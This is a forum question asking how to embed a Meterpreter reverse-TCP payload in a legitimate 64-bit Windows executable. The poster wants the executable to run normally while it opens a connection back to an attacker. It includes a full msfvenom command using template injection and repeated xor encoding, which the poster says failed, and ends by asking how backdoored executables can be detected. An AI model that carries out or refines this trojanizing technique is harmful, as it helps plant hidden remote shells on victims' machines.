How do you inject a payload (for example windows/x64/meterpreter/reverse_tcp) into an exe file?
Basically, when the target opens the exe file, it looks normal and operates as such but in the background, it creates a backdoor and establishes a connection to the attacker.
I’ve tried using msfvenom like so :
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=x -x /root/testExe.exe -k -a x64 --platform windows -e x64/xor_dynamic -i 3 -n 26 -f exe -o payloadTest.exe
This didn’t work, every time I tried to run it I got the message :
payloadTest.exe is not a valid Win32 application
-x /root/testExe.exe -k it worked fine.
I’ve also tried shellter but it only works with 32 bit payloads.
The system I’m trying to attack is Windows 7 64 bit. The file “testExe” has a 64 bit architecture and works file without the payload on the victim’s system.
In short, I’m looking for a way to bind the windows/x64/meterpreter/reverse_tcp payload to an exe file called “testExe”, so that when the target opens the “testExe” file, the payload inside the file connects back to the attacker.
I’m trying to learn how payloads are injected into exe files and how they can be detected. I’ve seen some examples with installers that seem legit but they open a meterpreter session for the attacker. Is there a way to confirm that your exe file is legitamate and doesn’t have a backdoor in it (besides checking with antivirus).